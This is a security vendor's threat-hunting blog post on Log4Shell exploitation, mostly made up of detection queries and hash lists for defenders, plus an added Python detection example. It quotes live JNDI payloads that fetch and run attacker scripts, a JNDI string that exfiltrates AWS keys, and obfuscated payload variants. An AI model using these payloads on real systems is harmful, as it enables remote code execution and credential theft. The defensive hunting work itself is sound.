# Hunting for Log4j CVE-2021-44228 (Log4Shell) Exploit Activity

By [Oded Awaskar](https://www.paloaltonetworks.com/blog/author/oded-awaskar/?ts=markdown "Posts by Oded Awaskar"), [Dror Alon](https://www.paloaltonetworks.com/blog/author/dror-alon/?ts=markdown "Posts by Dror Alon"), [Ryan Tracey](https://www.paloaltonetworks.com/blog/author/ryan-tracey/?ts=markdown "Posts by Ryan Tracey"), [Niv Sela](https://www.paloaltonetworks.com/blog/author/niv-sela/?ts=markdown "Posts by Niv Sela") and [Guy Arazi](https://www.paloaltonetworks.com/blog/author/guy-arazi/?ts=markdown "Posts by Guy Arazi")

Dec 13, 2021
### Overview

On December 9, 2021, a critical Remote Code Execution (RCE) vulnerability in Apache's Log4j library was discovered being exploited in the wild. The critical vulnerability, which garnered a CVSS severity score of 10 out of 10, enables a remote attacker to execute arbitrary code on an affected server and potentially take complete control of the system. Since the release, mass scanning activity has occurred as threat actors look for vulnerable systems and race to exploit them before they are patched.

In this post, we will deep dive into the payloads used by one of the threat actors performing exploitation attempts and demonstrate how blue teams can hunt for suspicious activities that may indicate the network was affected by CVE-2021-44228, on both Windows- and Linux-based installations and in cloud environments.

To understand how Cortex XDR can help detect and stop Log4j vulnerability exploits, view the [Apache Log4j blog post](https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/) published by Unit 42.

### Massive Scanning

Over the past few days, the Cortex XDR Managed Threat Hunting Team observed a surge in the amount of malicious requests attempting to exploit CVE-2021-44228 across organizations worldwide.
![Image #1: A Surge in Malicious Log4j Exploitation Attempts Over the Past 7 Days](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-25.png)
*Image #1: A Surge in Malicious Log4j Exploitation Attempts Over the Past 7 Days*

The Managed Threat Hunting team has hand-picked a few of the payloads for further analysis, to review the custom payloads used by the threat actors:

1. `${jndi:ldap://45.137[.]21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=}`
2. `${jndi:ldap://45.155[.]205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgMTkyLjk5LjE1Mi4yMDB8fHdnZXQgLXEgLU8tIDIxMi40Ny4yMzcuNjc6NDQzKXxiYXNo}`

**Stage 1: Base64 Deobfuscation**

Using [CyberChef](https://gchq.github.io/CyberChef/), an analysis of the payload reveals new IOCs controlled by the adversary: "192.99[.]152.200", "212.47[.]237.67" and "62.210[.]130.250".

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-26.png)

**Stage 2: Scripts Retrieval and Further Analysis**

![Stage 2: Scripts Retrieval and Further Analysis](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-27.png)
*Stage 2: Scripts Retrieval and Further Analysis*

The Cortex XDR Managed Threat Hunting experts downloaded the artifacts and carefully inspected them. The payloads hosted on "192.99[.]152.200" and "212.47[.]237.67" were downloaded and contained the script displayed below. The script also contained a rather polite "introduction" message in the first couple of lines.

![Image 2: A "Polite" Greeting Message](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-28.png)
*Image 2: A "Polite" Greeting Message*

Sadly, the second stage of the payload was not available on the threat actor's site; however, the line `sysctl -w vm.nr_hugepages=128 > /dev/null 2>&1` suggests an intention to mine cryptocurrency, as it increases the potential mining ability of the server by up to 20 percent.
The script downloaded from "62.210[.]130.250" is another downloader for the notorious "Mirai" botnet. It is pretty common for the "Mirai" botnet operators to exploit a new Remote Code Execution vulnerability in order to enlarge their zombie horde.

![Image #3: The "Mirai" botnet downloader](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-29.png)
*Image #3: The "Mirai" botnet downloader*

### Hunting for Log4Shell in Your Cloud Environment

Cortex XDR Managed Threat Hunting experts have joined efforts with the Cortex XDR research team to detect and hunt exploitation attempts in cloud environments. Some major examples as seen in the wild:

* Executing the following on vulnerable cloud hosts may lead to exfiltration of cloud credentials: `${jndi:ldap://host/${env:AWS_SECRET_ACCESS_KEY}.${env:AWS_ACCESS_KEY_ID}}`
* Leveraging the exploitation through API calls (as those API calls are usually logged) and their associated attacker-controlled attributes, such as the request parameters of the API call or the user agent.
For example:

* Cloud storage services: modify the object name, e.g. `projects/_/buckets/<bucket>/objects/${jndi:ldap://<host>:<port>/Exploit}` (the bracketed values are placeholders; the original page did not preserve them)
* User agent: `${jndi:${lower:l}${lower:d}a${lower:p}://<subdomain>.bin${upper:a}.io:<port>/callback}`

Cortex XDR customers can use this query to hunt for additional exploitation attempts within cloud audit logs:

```
dataset = cloud_audit_logs
| alter raw_log_decoded = replace(replace(replace(lowercase(raw_log), "%7b", "{"), "%24","$"), "%7d", "}")
| filter raw_log_decoded ~= "((?:\%24\%7B|\$%7B|\$\{|\$[^//]+\{)(?:j|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+j|(?:\-|\}|\:|\:\-|\}|\:|\$)j[^//]+|jn|jnd)(?:n|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+n|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|nd|ndi)?(?:d|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+d|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|di)(?:i|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+i|(?:\-|\}|\:|\:\-|\}|\:|\$)i[^//]+))" OR raw_log_decoded ~= "\${jndi"
```

Because there are so many exploitation attempts, finding a successful exploitation is not an easy task. However, we can leverage all of the XDR data sources and hunt for those malicious connections.
By correlating Cortex XDR cloud, NDR and EDR logs, we are able to extract IOCs from exploitation attempts and match them with established outbound network connections. For example, we can extract the attacker IP address from the payload as seen in Cortex XDR cloud logs, and look for successful outbound connections to this IP address. The same steps can be implemented for DNS queries.

Cortex XDR customers can use this query to hunt for successful exploitations by looking at EDR, firewall and flow log connections, which can imply real code execution on a service or compute instance:

```
dataset = cloud_audit_logs
| alter raw_log_decoded = replace(replace(replace(lowercase(raw_log), "%7b", "{"), "%24","$"), "%7d", "}")
| filter raw_log_decoded ~= "((?:\%24\%7B|\$%7B|\$\{|\$[^//]+\{)(?:j|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+j|(?:\-|\}|\:|\:\-|\}|\:|\$)j[^//]+|jn|jnd)(?:n|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+n|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|nd|ndi)?(?:d|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+d|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|di)(?:i|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+i|(?:\-|\}|\:|\:\-|\}|\:|\$)i[^//]+))" OR raw_log_decoded ~= "\${jndi"
| filter lowercase(operation_name_orig) not contains "jobservice" and user_agent != null
| alter ip = arrayindex(regextract(user_agent, "\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"), 0)
| filter ip != null
| fields ip, user_agent, raw_log_decoded
| join (dataset = xdr_data
    | filter action_remote_ip != null and (event_type = enum.STORY or event_type = enum.NETWORK)
    | fields action_remote_ip, cloud_entity, agent_id
    | alter cloud_instance_name = json_extract_scalar(to_json_string(cloud_entity), "$.entity_name")
    | dedup action_remote_ip, agent_id, cloud_instance_name) as remote_ips ip = remote_ips.action_remote_ip
| fields ip, user_agent, agent_id, cloud_instance_name, raw_log_decoded
```
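As an added example (not code from the original post), the following Python reproduces the decode-then-match logic of the two cloud queries above, using the same regular expression the post later applies to User-Agents, and then performs the correlation step against a constructed set of outbound connections. The event tuples, hostnames and RFC 5737 documentation addresses are constructed for illustration and are not IOCs from the post.

```python
import re

# Detection regex reproduced from the Cortex XQL queries on this page. It is
# written for input that has already been lowercased, exactly as the queries
# apply lowercase() to the field before matching.
JNDI_OBFUSCATED = re.compile(
    r"((?:\%24\%7B|\$%7B|\$\{|\$[^//]+\{)"
    r"(?:j|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+j|(?:\-|\}|\:|\:\-|\}|\:|\$)j[^//]+|jn|jnd)"
    r"(?:n|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+n|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|nd|ndi)?"
    r"(?:d|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+d|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|di)"
    r"(?:i|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+i|(?:\-|\}|\:|\:\-|\}|\:|\$)i[^//]+))"
)
# The plain "${jndi" fallback the queries OR together with the regex above.
JNDI_PLAIN = re.compile(r"\${jndi")
# IPv4 extraction regex taken from the cloud correlation query.
IPV4 = re.compile(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")


def normalize(raw: str) -> str:
    """Mirror the query's 'alter raw_log_decoded' step: lowercase, then undo the
    URL encoding of '$', '{' and '}' so an encoded probe looks like a plain one.
    Only this single level of encoding is handled, as in the original query."""
    return raw.lower().replace("%7b", "{").replace("%24", "$").replace("%7d", "}")


def is_jndi_probe(raw: str) -> bool:
    """True when the decoded value contains a JNDI lookup in any of the
    obfuscated spellings the regex covers."""
    decoded = normalize(raw)
    return bool(JNDI_OBFUSCATED.search(decoded) or JNDI_PLAIN.search(decoded))


def hunt(events):
    """events: iterable of (agent_hostname, user_agent). Returns one record per
    event that carries a JNDI probe, with the IPv4 addresses embedded in it."""
    hits = []
    for host, ua in events:
        if is_jndi_probe(ua):
            hits.append({"host": host, "user_agent": ua, "ips": IPV4.findall(normalize(ua))})
    return hits


def correlate(hits, outbound):
    """outbound: iterable of (agent_hostname, remote_ip) established connections,
    standing in for the xdr_data NETWORK/STORY rows the query joins on. An IP that
    was embedded in a probe and later saw an outbound connection from an agent is
    a candidate successful exploitation rather than a mere scan."""
    agents_by_ip = {}
    for agent, ip in outbound:
        agents_by_ip.setdefault(ip, []).append(agent)
    confirmed = []
    for hit in hits:
        for ip in hit["ips"]:
            for agent in agents_by_ip.get(ip, []):
                confirmed.append((ip, agent))
    return confirmed


# Constructed sample data. The user agents reuse the obfuscation patterns quoted
# on this page; the addresses are RFC 5737 documentation ranges, not real IOCs.
SAMPLE_EVENTS = [
    ("web-01", "${jndi:ldap://203.0.113.10:1389/a}"),
    ("web-01", "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.11/x"),
    ("web-02", "${JnD${upper:i}:lda${env:XXXX2323:-p}://203.0.113.12/cb"),
    ("web-02", "%24%7Bjndi:ldap://198.51.100.7/q%7D"),
    ("api-01", "${jndi:${lower:l}${lower:d}a${lower:p}://198.51.100.8/callback}"),
    ("api-01", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"),
    ("api-01", "curl/7.79.1"),
]
SAMPLE_OUTBOUND = [
    ("web-01", "203.0.113.11"),   # callback to an IP that appeared in a probe
    ("api-01", "198.51.100.8"),   # same
    ("web-02", "192.0.2.55"),     # unrelated traffic, never seen in a probe
]


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    print(f"{len(found)} probe(s) found in {len(SAMPLE_EVENTS)} events")
    for ip, agent in correlate(found, SAMPLE_OUTBOUND):
        print(f"agent {agent} connected out to {ip} after it appeared in a probe")
```

The plain-UA rows show the regex does not fire on ordinary traffic, while the two correlated rows are the ones worth escalating.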
### Hunting for Log4Shell in Your Network

The Cortex XDR Managed Threat Hunting team created a few queries which can enable defenders to determine if the network was affected by the CVE-2021-44228 vulnerability. The queries are divided into two sections:

1. Detecting potentially malicious activity attributed to the Log4j exploitation.
2. Detecting potentially affected hosts, which contain the vulnerable library.

**Section A: Detecting Hosts Which May Contain the Vulnerable Library**

1. Attempting to detect all Log4j jar loading. Trying to find all applications that utilize Log4j is nearly impossible, as it is bundled in a ton of different software. With that being said, we believe that this query will enable you to get at least a **partial** grip on this package's usage within your environment. The query lists every process whose name contains *java* that interacted with a file whose name contains *log4j* and whose extension is *jar*:

```
config case_sensitive = false timeframe=30d
| dataset = xdr_data
| filter actor_process_image_name contains "java"
| filter (agent_os_sub_type contains "server" or agent_os_type = ENUM.AGENT_OS_LINUX )
| filter action_file_name contains "log4j" and action_file_extension = "jar"
| fields agent_hostname, agent_ip_addresses, actor_effective_username, action_file_name, action_file_path
| dedup agent_hostname
```

2. Attempting to target all hosts that contain a file matching the SHA256 hash of a vulnerable Log4j version. Reference: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes/blob/main/sha256sums.txt

```
dataset = xdr_data
| fields agent_hostname, action_file_sha256, action_file_path, actor_process_image_sha256, actor_process_image_path, causality_actor_process_image_sha256, causality_actor_process_image_path
| filter action_file_sha256 in (
    "bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6",
    "58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae",
    "ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4",
    "dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e",
    "a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8",
    "7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b",
    "4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47",
    "473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6",
    "b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02",
    "dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d",
    "85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c",
    "db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a",
    "ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0",
    "a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d",
    "c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d",
    "8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc",
    "c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a",
    "6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2",
    "535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6",
    "42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239",
    "4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997",
    "df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6",
    "28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e",
    "cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392",
    "5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4",
    "ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa",
    "815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e",
    "10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c",
    "dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae",
    "9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d",
    "f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d",
    "5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3",
    "d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d",
    "3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100",
    "057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3",
    "5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c",
    "c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3",
    "6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992",
    "54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b",
    "e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1",
    "68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa",
    "9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463",
    "006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85")
| dedup agent_hostname, action_file_sha256, action_file_path, actor_process_image_sha256, actor_process_image_path, causality_actor_process_image_sha256, causality_actor_process_image_path
```

**Section B: Detecting Potentially Malicious Activity Attributed to the Log4j Exploitation**

1. Given the sheer amount of obfuscation possible in the malicious User-Agents, such as:

   1. `${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}`
   2. `${JnD${upper:i}:lda${env:XXXX2323:-p}:/`
   3. `${jndi:ldap://host/$`
   4. `${jndi:${lower:l}${lower:d}a${lower:p}:`

   we decided to use a regular expression targeting all permutations of the potential resources:

```
config case_sensitive = false timeframe=7d
| dataset = xdr_data
| filter lowercase(action_user_agent) ~= "((?:\%24\%7B|\$%7B|\$\{|\$[^//]+\{)(?:j|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+j|(?:\-|\}|\:|\:\-|\}|\:|\$)j[^//]+|jn|jnd)(?:n|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+n|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|nd|ndi)?(?:d|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+d|(?:\-|\}|\:|\:\-|\}|\:|\$)n[^//]+|di)(?:i|(?:\-|\}|\:|\:\-|\}|\:|\$)[^//]+i|(?:\-|\}|\:|\:\-|\}|\:|\$)i[^//]+))" OR lowercase(action_user_agent) ~= "\${jndi"
| fields action_user_agent, agent_hostname, action_process_image_name, action_process_image_command_line
```

2. Harness the power of "out of the ordinary": the following query creates a list of the rare Java process causality chains, for both action processes and their command lines. Ideally, for any type of payload, you will be able to uncover any unusual processes and their commands. This means that for Java child processes, the query counts the number of appearances over the past 90 days and lists them only if they were spotted fewer than 10 times on that specific host.

```
config case_sensitive = false timeframe=90d
| dataset = xdr_data
| alter ct = current_time()
| alter diff = timestamp_diff(ct, _time, "DAY")
| filter event_type = ENUM.FILE and ( actor_process_image_name contains "java" ) and diff < 7
| dedup action_process_image_command_line, agent_hostname, actor_process_image_name
| fields action_file_path, action_file_name, agent_hostname, actor_process_image_name, action_process_image_name
| join conflict_strategy = left type = left (
    dataset = xdr_data
    | filter event_type = ENUM.FILE and ( actor_process_image_name contains "java" )
    | comp count(action_file_name) as Action_File_Days_count by actor_process_image_name
  ) as Three_Months_Action_Process (Three_Months_Action_Process.actor_process_image_name = actor_process_image_name)
| join conflict_strategy = left type = left (
    dataset = xdr_data
    | filter event_type = ENUM.FILE and ( actor_process_image_name contains "java" )
    | comp count(action_file_path) as Path_Days_count by actor_process_image_name
  ) as Three_Months_CommandLine (Three_Months_CommandLine.actor_process_image_name = action_process_image_name )
| dedup agent_hostname, actor_process_image_name, action_process_image_name
| sort asc Path_Days_count, asc Action_File_Days_count
| filter Path_Days_count < 10 and Action_File_Days_count < 10
```

### Conclusion

We're probably seeing only the tip of the iceberg; it's only a matter of time until different threat actors and groups utilize this vulnerability to deploy even more sophisticated malware and payloads onto vulnerable servers. Hopefully these queries will assist you in proactively hunting for this threat in your network. Happy Hunting!
Preferences](https://start.paloaltonetworks.com/preference-center) * [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown) * [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown) * [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown) * [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown) * [Tech Docs](https://docs.paloaltonetworks.com/) * [Unit 42](https://unit42.paloaltonetworks.com/) * [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd) ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg) * [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown) * [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown) * [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) * [Documents](https://www.paloaltonetworks.com/legal?ts=markdown) Copyright © 2026 Palo Alto Networks. All Rights Reserved * [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks) * [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown) * [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/) * [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks) * [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks) * EN Select your language